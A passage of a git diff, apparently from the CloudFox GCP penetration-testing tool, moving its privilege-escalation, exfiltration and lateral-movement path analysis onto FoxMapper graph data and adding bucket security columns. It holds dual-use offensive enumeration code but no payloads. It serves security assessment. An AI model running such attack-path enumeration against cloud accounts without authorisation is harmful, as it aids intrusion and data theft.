cache: %d principals, %d admins, %d with privesc", totalNodes, adminNodes, nodesWithPrivesc), "all-checks") } else { - // Load from disk or run analysis - attackPathCache := loadOrRunAttackPathAnalysis(ctx, GCPRefreshCache) - if attackPathCache != nil && attackPathCache.IsPopulated() { - ctx = gcpinternal.SetAttackPathCacheInContext(ctx, attackPathCache) + // Get org ID from org cache if available (GCPOrganization flag may be empty) + orgID := GCPOrganization + if orgID == "" { + if orgCache := gcpinternal.GetOrgCacheFromContext(ctx); orgCache != nil && len(orgCache.Organizations) > 0 { + orgID = orgCache.Organizations[0].ID + } + } + + // Try to load FoxMapper data + foxMapperCache := gcpinternal.TryLoadFoxMapper(orgID, GCPProjectIDs) + if foxMapperCache != nil && foxMapperCache.IsPopulated() { + ctx = gcpinternal.SetFoxMapperCacheInContext(ctx, foxMapperCache) cmd.SetContext(ctx) - privesc, exfil, lateral := attackPathCache.GetStats() - GCPLogger.SuccessM(fmt.Sprintf("Attack path cache ready: %d privesc, %d exfil, %d lateral", privesc, exfil, lateral), "all-checks") + totalNodes, adminNodes, nodesWithPrivesc := foxMapperCache.GetStats() + GCPLogger.SuccessM(fmt.Sprintf("FoxMapper data loaded: %d principals, %d admins, %d with privesc", totalNodes, adminNodes, nodesWithPrivesc), "all-checks") + } else { + GCPLogger.InfoM("No FoxMapper data found. Run 'foxmapper gcp graph create' for attack path analysis.", "all-checks") } } GCPLogger.InfoM("", "all-checks") @@ -315,122 +336,6 @@ var GCPAllChecksCommand = &cobra.Command{ }, } -// loadOrRunAttackPathAnalysis loads attack path cache from disk if available, or runs analysis and saves it -func loadOrRunAttackPathAnalysis(ctx context.Context, forceRefresh bool) *gcpinternal.AttackPathCache { - account, _ := ctx.Value("account").(string) - - // Check if cache exists and we're not forcing refresh - if !forceRefresh && gcpinternal.AttackPathCacheExists(GCPOutputDirectory, account) { - // Check if cache is stale (older than 24 hours) - if gcpinternal.IsCacheStale(GCPOutputDirectory, account, "attack-paths", gcpinternal.DefaultCacheExpiration) { - age, _ := gcpinternal.GetCacheAge(GCPOutputDirectory, account, "attack-paths") - GCPLogger.InfoM(fmt.Sprintf("Attack path cache is stale (age: %s > 24h), refreshing...", formatDuration(age)), "gcp") - } else { - cache, metadata, err := gcpinternal.LoadAttackPathCacheFromFile(GCPOutputDirectory, account) - if err == nil && cache != nil { - age, _ := gcpinternal.GetCacheAge(GCPOutputDirectory, account, "attack-paths") - privesc, exfil, lateral := cache.GetStats() - GCPLogger.InfoM(fmt.Sprintf("Loaded attack path cache from disk (age: %s, %d projects analyzed, P:%d E:%d L:%d)", - formatDuration(age), len(metadata.ProjectsIn), privesc, exfil, lateral), "gcp") - return cache - } - if err != nil { - GCPLogger.InfoM(fmt.Sprintf("Could not load attack path cache: %v, re-analyzing...", err), "gcp") - // Delete corrupted cache file - gcpinternal.DeleteCache(GCPOutputDirectory, account, "attack-paths") - } - } - } - - // Run analysis and create cache - return runAttackPathAnalysisAndSave(ctx) -} - -// runAttackPathAnalysisAndSave runs attack path analysis and saves to disk -func runAttackPathAnalysisAndSave(ctx context.Context) *gcpinternal.AttackPathCache { - cache := gcpinternal.NewAttackPathCache() - - // Get project IDs from context - projectIDs, ok := ctx.Value("projectIDs").([]string) - if !ok || len(projectIDs) == 0 { - return cache - } - - // Get account from context - account, _ := ctx.Value("account").(string) - - // Get project names from context - projectNames, _ := ctx.Value("projectNames").(map[string]string) - if projectNames == nil { - projectNames = make(map[string]string) - } - - // Use unified attackpathService for all 3 types - svc := attackpathservice.New() - - // Run analysis for all attack path types - result, err := svc.CombinedAttackPathAnalysis(ctx, projectIDs, projectNames, "all") - if err != nil { - GCPLogger.ErrorM(fmt.Sprintf("Failed to run attack path analysis: %v", err), "gcp") - return cache - } - - // Store raw data for modules that need full details (like privesc) - cache.SetRawData(result) - - // Convert paths to cache format - var pathInfos []gcpinternal.AttackPathInfo - for _, path := range result.AllPaths { - var pathType gcpinternal.AttackPathType - switch path.PathType { - case "privesc": - pathType = gcpinternal.AttackPathPrivesc - case "exfil": - pathType = gcpinternal.AttackPathExfil - case "lateral": - pathType = gcpinternal.AttackPathLateral - default: - continue - } - - pathInfos = append(pathInfos, gcpinternal.AttackPathInfo{ - Principal: path.Principal, - PrincipalType: path.PrincipalType, - Method: path.Method, - PathType: pathType, - Category: path.Category, - RiskLevel: path.RiskLevel, - Target: path.TargetResource, - Permissions: path.Permissions, - ScopeType: path.ScopeType, - ScopeID: path.ScopeID, - }) - } - - // Populate cache - cache.PopulateFromPaths(pathInfos) - - // Save to disk - err = gcpinternal.SaveAttackPathCacheToFile(cache, projectIDs, GCPOutputDirectory, account, "2.0.0") - if err != nil { - GCPLogger.InfoM(fmt.Sprintf("Could not save attack path cache to disk: %v", err), "gcp") - } else { - cacheDir := gcpinternal.GetCacheDirectory(GCPOutputDirectory, account) - GCPLogger.InfoM(fmt.Sprintf("Attack path cache saved to %s", cacheDir), "gcp") - } - - privesc, exfil, lateral := cache.GetStats() - GCPLogger.InfoM(fmt.Sprintf("Attack path analysis: %d privesc, %d exfil, %d lateral", privesc, exfil, lateral), "gcp") - - return cache -} - -// runPrivescAndPopulateCache is kept for backward compatibility -// DEPRECATED: Use loadOrRunAttackPathAnalysis instead -func runPrivescAndPopulateCache(ctx context.Context) *gcpinternal.PrivescCache { - return runAttackPathAnalysisAndSave(ctx) -} - // loadOrPopulateOrgCache loads org cache from disk if available, or enumerates and saves it func loadOrPopulateOrgCache(account string, forceRefresh bool) *gcpinternal.OrgCache { // Check if cache exists and we're not forcing refresh @@ -665,6 +570,7 @@ func init() { commands.GCPLateralMovementCommand, commands.GCPDataExfiltrationCommand, commands.GCPPublicAccessCommand, + commands.GCPFoxMapperCommand, // Inventory command commands.GCPInventoryCommand, diff --git a/gcp/commands/appengine.go b/gcp/commands/appengine.go index 6cbee0b4..e015ab92 100644 --- a/gcp/commands/appengine.go +++ b/gcp/commands/appengine.go @@ -104,7 +104,7 @@ type AppEngineModule struct { ProjectVersions map[string][]AppEngineVersion ProjectFirewallRules map[string][]AppEngineFirewallRule LootMap map[string]map[string]*internal.LootFile - AttackPathCache *gcpinternal.AttackPathCache // Cached attack path analysis results + FoxMapperCache *gcpinternal.FoxMapperCache // FoxMapper cache for attack path analysis mu sync.Mutex totalApps int @@ -149,8 +149,8 @@ func runGCPAppEngineCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *AppEngineModule) Execute(ctx context.Context, logger internal.Logger) { - // Get attack path cache from context (populated by all-checks or attack path analysis) - m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) + // Get FoxMapper cache from context + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) logger.InfoM("Enumerating App Engine applications...", GCP_APPENGINE_MODULE_NAME) @@ -535,9 +535,9 @@ func (m *AppEngineModule) buildTablesForProject(projectID string, apps []AppEngi // Check attack paths (privesc/exfil/lateral) for the service account attackPaths := "run --attack-paths" - if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { if ver.ServiceAccount != "" { - attackPaths = m.AttackPathCache.GetAttackSummary(ver.ServiceAccount) + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, ver.ServiceAccount) } else { attackPaths = "No" } diff --git a/gcp/commands/bucketenum.go b/gcp/commands/bucketenum.go index 84eae29f..1b1f43d3 100644 --- a/gcp/commands/bucketenum.go +++ b/gcp/commands/bucketenum.go @@ -332,15 +332,15 @@ func (m *BucketEnumModule) writeOutput(ctx context.Context, logger internal.Logg } func (m *BucketEnumModule) getFilesHeader() []string { - return []string{"Project", "Bucket", "Object Name", "Category", "Size", "Public", "Description"} + return []string{"Project", "Bucket", "Object Name", "Category", "Size", "Public", "Encryption", "Description"} } func (m *BucketEnumModule) getSensitiveFilesHeader() []string { - return []string{"Project", "Bucket", "Object Name", "Category", "Size", "Public"} + return []string{"Project", "Bucket", "Object Name", "Category", "Size", "Public", "Encryption"} } func (m *BucketEnumModule) getAllObjectsHeader() []string { - return []string{"Project", "Bucket", "Object Name", "Content Type", "Size", "Public", "Updated"} + return []string{"Project", "Bucket", "Object Name", "Content Type", "Size", "Public", "Encryption", "Updated"} } func (m *BucketEnumModule) filesToTableBody(files []bucketenumservice.SensitiveFileInfo) [][]string { @@ -357,6 +357,7 @@ func (m *BucketEnumModule) filesToTableBody(files []bucketenumservice.SensitiveF file.Category, formatFileSize(file.Size), publicStatus, + file.Encryption, file.Description, }) } @@ -378,6 +379,7 @@ func (m *BucketEnumModule) sensitiveFilesToTableBody(files []bucketenumservice.S file.Category, formatFileSize(file.Size), publicStatus, + file.Encryption, }) } } @@ -398,6 +400,7 @@ func (m *BucketEnumModule) allObjectsToTableBody(objects []bucketenumservice.Obj obj.ContentType, formatFileSize(obj.Size), publicStatus, + obj.Encryption, obj.Updated, }) } diff --git a/gcp/commands/buckets.go b/gcp/commands/buckets.go index d42e1f48..bf674fa2 100644 --- a/gcp/commands/buckets.go +++ b/gcp/commands/buckets.go @@ -25,18 +25,29 @@ Features: - Shows security configuration (public access prevention, uniform access, versioning) - Enumerates IAM policies and identifies public buckets - Shows encryption type (Google-managed vs CMEK) -- Shows retention and soft delete policies +- Shows retention, soft delete, and lifecycle policies - Generates gcloud commands for further enumeration - Generates exploitation commands for data access Security Columns: - Public: Whether the bucket has allUsers or allAuthenticatedUsers access -- PublicAccessPrevention: "enforced" prevents public access at org/project level -- UniformAccess: true means IAM-only (no ACLs), recommended for security -- Versioning: Object versioning enabled (helps with recovery/compliance) -- Logging: Access logging enabled (audit trail) -- Encryption: "Google-managed" or "CMEK" (customer-managed keys) -- Retention: Data retention policy (compliance/immutability)`, +- Public Access Prevention: + "enforced" = Public access blocked at bucket level + "inherited" = Inherits from project/org (may allow public if not blocked above) + "unspecified" = No prevention (most permissive) +- Uniform Access: + "Yes" = IAM-only access control (recommended, no ACLs) + "No (ACLs)" = Legacy ACLs enabled - access can be granted at object level + bypassing bucket IAM, harder to audit +- Soft Delete: Retention period for deleted objects (ransomware protection) + "No" = Deleted objects are immediately removed + "Xd" = Deleted objects retained for X days before permanent deletion +- Lifecycle: Automated object management rules + "Delete@Xd" = Objects auto-deleted after X days (data loss risk if short) + "Archive" = Objects transitioned to cheaper storage classes + "X rules" = Number of lifecycle rules configured +- Versioning: Object versioning (helps recovery, compliance) +- Encryption: "Google-managed" or "CMEK" (customer-managed keys)`, Run: runGCPBucketsCommand, } @@ -49,7 +60,7 @@ type BucketsModule struct { // Module-specific fields - per-project for hierarchical output ProjectBuckets map[string][]CloudStorageService.BucketInfo // projectID -> buckets LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - AttackPathCache *gcpinternal.AttackPathCache // Cached attack path analysis results + FoxMapperCache *gcpinternal.FoxMapperCache // FoxMapper graph data (preferred) mu sync.Mutex } @@ -89,17 +100,10 @@ func runGCPBucketsCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *BucketsModule) Execute(ctx context.Context, logger internal.Logger) { - // Get attack path cache from context (populated by all-checks or attack path analysis) - m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) - - // If no context cache, try loading from disk cache - if m.AttackPathCache == nil || !m.AttackPathCache.IsPopulated() { - diskCache, metadata, err := gcpinternal.LoadAttackPathCacheFromFile(m.OutputDirectory, m.Account) - if err == nil && diskCache != nil && diskCache.IsPopulated() { - logger.InfoM(fmt.Sprintf("Using attack path cache from disk (created: %s)", - metadata.CreatedAt.Format("2006-01-02 15:04:05")), globals.GCP_BUCKETS_MODULE_NAME) - m.AttackPathCache = diskCache - } + // Try to get FoxMapper cache (preferred - graph-based analysis) + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Using FoxMapper graph data for attack path analysis", globals.GCP_BUCKETS_MODULE_NAME) } // Run enumeration with concurrency @@ -359,8 +363,11 @@ func (m *BucketsModule) getTableHeader() []string { "Name", "Location", "Public", - "Versioning", + "Public Access Prevention", "Uniform Access", + "Soft Delete", + "Lifecycle", + "Versioning", "Encryption", "IAM Binding Role", "Principal Type", @@ -379,6 +386,41 @@ func (m *BucketsModule) bucketsToTableBody(buckets []CloudStorageService.BucketI publicDisplay = bucket.PublicAccess } + // Format soft delete + softDeleteDisplay := "No" + if bucket.SoftDeleteEnabled { + softDeleteDisplay = fmt.Sprintf("%dd", bucket.SoftDeleteRetentionDays) + } + + // Format lifecycle - show delete rule age if present + lifecycleDisplay := "No" + if bucket.LifecycleEnabled { + if bucket.HasDeleteRule && bucket.ShortestDeleteDays > 0 { + lifecycleDisplay = fmt.Sprintf("Delete@%dd", bucket.ShortestDeleteDays) + } else if bucket.HasArchiveRule { + lifecycleDisplay = "Archive" + } else { + lifecycleDisplay = fmt.Sprintf("%d rules", bucket.LifecycleRuleCount) + } + } + + // Format uniform access - highlight security concern if disabled + uniformAccessDisplay := "Yes" + if !bucket.UniformBucketLevelAccess { + uniformAccessDisplay = "No (ACLs)" + } + + // Format encryption - show KMS key if CMEK + encryptionDisplay := bucket.EncryptionType + if bucket.EncryptionType == "CMEK" && bucket.KMSKeyName != "" { + // Extract just the key name from the full path for display + // Format: projects/PROJECT/locations/LOCATION/keyRings/RING/cryptoKeys/KEY + keyParts := strings.Split(bucket.KMSKeyName, "/") + if len(keyParts) >= 2 { + encryptionDisplay = fmt.Sprintf("CMEK (%s)", keyParts[len(keyParts)-1]) + } + } + // One row per IAM member if len(bucket.IAMBindings) > 0 { for _, binding := range bucket.IAMBindings { @@ -388,13 +430,9 @@ func (m *BucketsModule) bucketsToTableBody(buckets []CloudStorageService.BucketI // Check attack paths for service account principals attackPaths := "-" if memberType == "ServiceAccount" { - if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { - // Extract email from member string (serviceAccount:email@...) - email := strings.TrimPrefix(member, "serviceAccount:") - attackPaths = m.AttackPathCache.GetAttackSummary(email) - } else { - attackPaths = "run --attack-paths" - } + // Extract email from member string (serviceAccount:email@...) + email := strings.TrimPrefix(member, "serviceAccount:") + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, email) } body = append(body, []string{ @@ -402,9 +440,12 @@ func (m *BucketsModule) bucketsToTableBody(buckets []CloudStorageService.BucketI bucket.Name, bucket.Location, publicDisplay, + bucket.PublicAccessPrevention, + uniformAccessDisplay, + softDeleteDisplay, + lifecycleDisplay, shared.BoolToYesNo(bucket.VersioningEnabled), - shared.BoolToYesNo(bucket.UniformBucketLevelAccess), - bucket.EncryptionType, + encryptionDisplay, binding.Role, memberType, member, @@ -419,9 +460,12 @@ func (m *BucketsModule) bucketsToTableBody(buckets []CloudStorageService.BucketI bucket.Name, bucket.Location, publicDisplay, + bucket.PublicAccessPrevention, + uniformAccessDisplay, + softDeleteDisplay, + lifecycleDisplay, shared.BoolToYesNo(bucket.VersioningEnabled), - shared.BoolToYesNo(bucket.UniformBucketLevelAccess), - bucket.EncryptionType, + encryptionDisplay, "-", "-", "-", diff --git a/gcp/commands/cloudbuild.go b/gcp/commands/cloudbuild.go index 4a54a0f9..4f7bd42b 100644 --- a/gcp/commands/cloudbuild.go +++ b/gcp/commands/cloudbuild.go @@ -39,7 +39,7 @@ type CloudBuildModule struct { ProjectBuilds map[string][]cloudbuildservice.BuildInfo // projectID -> builds ProjectSecurityAnalysis map[string][]cloudbuildservice.TriggerSecurityAnalysis // projectID -> analysis LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - AttackPathCache *gcpinternal.AttackPathCache // Cached attack path analysis results + FoxMapperCache *gcpinternal.FoxMapperCache // Cached FoxMapper attack path analysis results mu sync.Mutex } @@ -78,8 +78,8 @@ func runGCPCloudBuildCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *CloudBuildModule) Execute(ctx context.Context, logger internal.Logger) { - // Get attack path cache from context (populated by all-checks or attack path analysis) - m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) + // Get FoxMapper cache from context + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CLOUDBUILD_MODULE_NAME, m.processProject) @@ -348,9 +348,9 @@ func (m *CloudBuildModule) triggersToTableBody(triggers []cloudbuildservice.Trig // Check attack paths (privesc/exfil/lateral) for the service account attackPaths := "run --attack-paths" - if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { if sa != "(default)" && sa != "" { - attackPaths = m.AttackPathCache.GetAttackSummary(sa) + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sa) } else { attackPaths = "No" } diff --git a/gcp/commands/cloudrun.go b/gcp/commands/cloudrun.go index 982d0ea9..41e46361 100644 --- a/gcp/commands/cloudrun.go +++ b/gcp/commands/cloudrun.go @@ -61,7 +61,7 @@ type CloudRunModule struct { ProjectServices map[string][]CloudRunService.ServiceInfo // projectID -> services ProjectJobs map[string][]CloudRunService.JobInfo // projectID -> jobs LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - AttackPathCache *gcpinternal.AttackPathCache // Cached attack path analysis results + FoxMapperCache *gcpinternal.FoxMapperCache // FoxMapper graph data (preferred) mu sync.Mutex } @@ -99,17 +99,10 @@ func runGCPCloudRunCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *CloudRunModule) Execute(ctx context.Context, logger internal.Logger) { - // Get attack path cache from context (populated by all-checks or attack path analysis) - m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) - - // If no context cache, try loading from disk cache - if m.AttackPathCache == nil || !m.AttackPathCache.IsPopulated() { - diskCache, metadata, err := gcpinternal.LoadAttackPathCacheFromFile(m.OutputDirectory, m.Account) - if err == nil && diskCache != nil && diskCache.IsPopulated() { - logger.InfoM(fmt.Sprintf("Using attack path cache from disk (created: %s)", - metadata.CreatedAt.Format("2006-01-02 15:04:05")), globals.GCP_CLOUDRUN_MODULE_NAME) - m.AttackPathCache = diskCache - } + // Try to get FoxMapper cache (preferred - graph-based analysis) + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Using FoxMapper graph data for attack path analysis", globals.GCP_CLOUDRUN_MODULE_NAME) } m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CLOUDRUN_MODULE_NAME, m.processProject) @@ -477,12 +470,10 @@ func (m *CloudRunModule) buildTablesForProject(projectID string, services []Clou // Check attack paths (privesc/exfil/lateral) for the service account attackPaths := "run --attack-paths" - if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { - if svc.ServiceAccount != "" { - attackPaths = m.AttackPathCache.GetAttackSummary(svc.ServiceAccount) - } else { - attackPaths = "No" - } + if svc.ServiceAccount != "" { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, svc.ServiceAccount) + } else if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + attackPaths = "No SA" } // If service has IAM bindings, create one row per binding @@ -547,12 +538,10 @@ func (m *CloudRunModule) buildTablesForProject(projectID string, services []Clou // Check attack paths (privesc/exfil/lateral) for the service account jobAttackPaths := "run --attack-paths" - if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { - if job.ServiceAccount != "" { - jobAttackPaths = m.AttackPathCache.GetAttackSummary(job.ServiceAccount) - } else { - jobAttackPaths = "No" - } + if job.ServiceAccount != "" { + jobAttackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, job.ServiceAccount) + } else if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + jobAttackPaths = "No SA" } // If job has IAM bindings, create one row per binding diff --git a/gcp/commands/composer.go b/gcp/commands/composer.go index eb862530..f3a8c397 100644 --- a/gcp/commands/composer.go +++ b/gcp/commands/composer.go @@ -33,7 +33,7 @@ type ComposerModule struct { gcpinternal.BaseGCPModule ProjectEnvironments map[string][]composerservice.EnvironmentInfo // projectID -> environments LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - AttackPathCache *gcpinternal.AttackPathCache // Cached attack path analysis results + FoxMapperCache *gcpinternal.FoxMapperCache // FoxMapper cache for attack path analysis mu sync.Mutex } @@ -60,8 +60,8 @@ func runGCPComposerCommand(cmd *cobra.Command, args []string) { } func (m *ComposerModule) Execute(ctx context.Context, logger internal.Logger) { - // Get attack path cache from context (populated by all-checks or attack path analysis) - m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) + // Get FoxMapper cache from context + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_COMPOSER_MODULE_NAME, m.processProject) @@ -202,9 +202,9 @@ func (m *ComposerModule) environmentsToTableBody(environments []composerservice. // Check attack paths (privesc/exfil/lateral) for the service account attackPaths := "run --attack-paths" - if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { if sa != "(default)" && sa != "" { - attackPaths = m.AttackPathCache.GetAttackSummary(sa) + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sa) } else { attackPaths = "No" } diff --git a/gcp/commands/crossproject.go b/gcp/commands/crossproject.go index 9dfb0142..eec453b1 100644 --- a/gcp/commands/crossproject.go +++ b/gcp/commands/crossproject.go @@ -66,14 +66,14 @@ Single project analysis (-p) will have limited results.`, type CrossProjectModule struct { gcpinternal.BaseGCPModule - CrossBindings []crossprojectservice.CrossProjectBinding - CrossProjectSAs []crossprojectservice.CrossProjectServiceAccount - LateralMovementPaths []crossprojectservice.LateralMovementPath - CrossProjectSinks []crossprojectservice.CrossProjectLoggingSink - CrossProjectPubSub []crossprojectservice.CrossProjectPubSubExport - LootMap map[string]*internal.LootFile - AttackPathCache *gcpinternal.AttackPathCache - OrgCache *gcpinternal.OrgCache + CrossBindings []crossprojectservice.CrossProjectBinding + CrossProjectSAs []crossprojectservice.CrossProjectServiceAccount + LateralMovementPaths []crossprojectservice.LateralMovementPath + CrossProjectSinks []crossprojectservice.CrossProjectLoggingSink + CrossProjectPubSub []crossprojectservice.CrossProjectPubSubExport + LootMap map[string]*internal.LootFile + FoxMapperCache *gcpinternal.FoxMapperCache + OrgCache *gcpinternal.OrgCache } // ------------------------------ @@ -118,17 +118,10 @@ func runGCPCrossProjectCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *CrossProjectModule) Execute(ctx context.Context, logger internal.Logger) { - // Get attack path cache from context (populated by all-checks or attack path analysis) - m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) - - // If no context cache, try loading from disk cache - if m.AttackPathCache == nil || !m.AttackPathCache.IsPopulated() { - diskCache, metadata, err := gcpinternal.LoadAttackPathCacheFromFile(m.OutputDirectory, m.Account) - if err == nil && diskCache != nil && diskCache.IsPopulated() { - logger.InfoM(fmt.Sprintf("Using attack path cache from disk (created: %s)", - metadata.CreatedAt.Format("2006-01-02 15:04:05")), globals.GCP_CROSSPROJECT_MODULE_NAME) - m.AttackPathCache = diskCache - } + // Get FoxMapper cache for graph-based analysis + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Using FoxMapper graph data for attack path analysis", globals.GCP_CROSSPROJECT_MODULE_NAME) } // Get org cache from context (populated by --org-cache flag or all-checks) @@ -371,31 +364,8 @@ func (m *CrossProjectModule) getImpersonationTarget(principal, role, targetProje return "-", "-" } - // Try to get impersonation targets from cache - if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { - cleanedPrincipal := cleanPrincipal(principal) - targets := m.AttackPathCache.GetImpersonationTargets(cleanedPrincipal) - if len(targets) > 0 { - // Filter targets to those in the target project - var projectTargets []string - for _, t := range targets { - if strings.Contains(t, targetProject) { - projectTargets = append(projectTargets, t) - } - } - if len(projectTargets) > 0 { - if len(projectTargets) == 1 { - return "Service Account", projectTargets[0] - } - return "Service Account", fmt.Sprintf("%d SAs", len(projectTargets)) - } - // If no project-specific targets, show all targets - if len(targets) == 1 { - return "Service Account", targets[0] - } - return "Service Account", fmt.Sprintf("%d SAs", len(targets)) - } - } + // FoxMapper handles impersonation differently via graph edges + // Since we no longer use AttackPathCache, we rely on FoxMapper or show a generic message // No specific targets found in cache - this likely means the role was granted at the // project level (not on specific SAs), which means ALL SAs in the target project can be impersonated @@ -454,16 +424,12 @@ func extractCrossProjectResourceName(path string) string { // getAttackPathForTarget returns attack path summary for a principal accessing a target project func (m *CrossProjectModule) getAttackPathForTarget(targetProject, principal string) string { - if m.AttackPathCache == nil || !m.AttackPathCache.IsPopulated() { - return "-" - } - // Clean principal for lookup cleanedPrincipal := cleanPrincipal(principal) // Check if this is a service account if strings.Contains(cleanedPrincipal, "@") && strings.Contains(cleanedPrincipal, ".iam.gserviceaccount.com") { - return m.AttackPathCache.GetAttackSummary(cleanedPrincipal) + return gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, cleanedPrincipal) } return "-" diff --git a/gcp/commands/dataexfiltration.go b/gcp/commands/dataexfiltration.go index 3907fd1b..ad0a8f4a 100644 --- a/gcp/commands/dataexfiltration.go +++ b/gcp/commands/dataexfiltration.go @@ -6,8 +6,8 @@ import ( "strings" "sync" - attackpathservice "github.com/BishopFox/cloudfox/gcp/services/attackpathService" bigqueryservice "github.com/BishopFox/cloudfox/gcp/services/bigqueryService" + foxmapperservice "github.com/BishopFox/cloudfox/gcp/services/foxmapperService" loggingservice "github.com/BishopFox/cloudfox/gcp/services/loggingService" orgpolicyservice "github.com/BishopFox/cloudfox/gcp/services/orgpolicyService" pubsubservice "github.com/BishopFox/cloudfox/gcp/services/pubsubService" @@ -33,7 +33,8 @@ var GCPDataExfiltrationCommand = &cobra.Command{ Short: "Identify data exfiltration paths and high-risk data exposure", Long: `Identify data exfiltration vectors and paths in GCP environments. -This module identifies both ACTUAL misconfigurations and POTENTIAL exfiltration vectors. +This module identifies both ACTUAL misconfigurations and POTENTIAL exfiltration vectors +using FoxMapper graph data for permission analysis. Actual Findings (specific resources): - Public snapshots and images (actual IAM policy check) @@ -43,12 +44,16 @@ Actual Findings (specific resources): - BigQuery datasets with public IAM bindings - Storage Transfer Service jobs to external destinations -Potential Vectors (capabilities that exist): -- BigQuery Export: Can export data to GCS bucket or external table -- Pub/Sub Subscription: Can push messages to external HTTP endpoint -- Cloud Function: Can make outbound HTTP requests to external endpoints -- Cloud Run: Can make outbound HTTP requests to external endpoints -- Logging Sink: Can export logs to external project or Pub/Sub topic +Permission-Based Vectors (from FoxMapper graph): +- Storage objects read/list permissions +- BigQuery data access and export permissions +- Cloud SQL export and connect permissions +- Secret Manager access permissions +- KMS decrypt permissions +- Logging read permissions + +Prerequisites: +- Run 'foxmapper gcp graph create' for permission-based analysis Security Controls Checked: - VPC Service Controls (VPC-SC) perimeter protection @@ -75,7 +80,6 @@ type ExfiltrationPath struct { VPCSCProtected bool // Is this project protected by VPC-SC? } - type PublicExport struct { ResourceType string ResourceName string @@ -101,22 +105,20 @@ type OrgPolicyProtection struct { MissingProtections []string } -// PermissionBasedExfilPath is replaced by attackpathservice.AttackPath for centralized handling - // ------------------------------ // Module Struct // ------------------------------ type DataExfiltrationModule struct { gcpinternal.BaseGCPModule - ProjectExfiltrationPaths map[string][]ExfiltrationPath // projectID -> paths - ProjectPublicExports map[string][]PublicExport // projectID -> exports - ProjectAttackPaths map[string][]attackpathservice.AttackPath // projectID -> permission-based attack paths - LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + ProjectExfiltrationPaths map[string][]ExfiltrationPath // projectID -> paths + ProjectPublicExports map[string][]PublicExport // projectID -> exports + FoxMapperFindings []foxmapperservice.DataExfilFinding // FoxMapper-based findings + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files mu sync.Mutex vpcscProtectedProj map[string]bool // Projects protected by VPC-SC orgPolicyProtection map[string]*OrgPolicyProtection // Org policy protections per project - usedAttackPathCache bool // Whether attack paths were loaded from cache + FoxMapperCache *gcpinternal.FoxMapperCache // FoxMapper cache for unified data access } // ------------------------------ @@ -143,7 +145,7 @@ func runGCPDataExfiltrationCommand(cmd *cobra.Command, args []string) { BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), ProjectExfiltrationPaths: make(map[string][]ExfiltrationPath), ProjectPublicExports: make(map[string][]PublicExport), - ProjectAttackPaths: make(map[string][]attackpathservice.AttackPath), + FoxMapperFindings: []foxmapperservice.DataExfilFinding{}, LootMap: make(map[string]map[string]*internal.LootFile), vpcscProtectedProj: make(map[string]bool), orgPolicyProtection: make(map[string]*OrgPolicyProtection), @@ -163,7 +165,6 @@ func (m *DataExfiltrationModule) getAllExfiltrationPaths() []ExfiltrationPath { return all } - func (m *DataExfiltrationModule) getAllPublicExports() []PublicExport { var all []PublicExport for _, exports := range m.ProjectPublicExports { @@ -172,39 +173,18 @@ func (m *DataExfiltrationModule) getAllPublicExports() []PublicExport { return all } -func (m *DataExfiltrationModule) getAllAttackPaths() []attackpathservice.AttackPath { - var all []attackpathservice.AttackPath - for _, paths := range m.ProjectAttackPaths { - all = append(all, paths...) - } - return all -} - func (m *DataExfiltrationModule) Execute(ctx context.Context, logger internal.Logger) { logger.InfoM("Identifying data exfiltration paths and potential vectors...", GCP_DATAEXFILTRATION_MODULE_NAME) - var usedCache bool 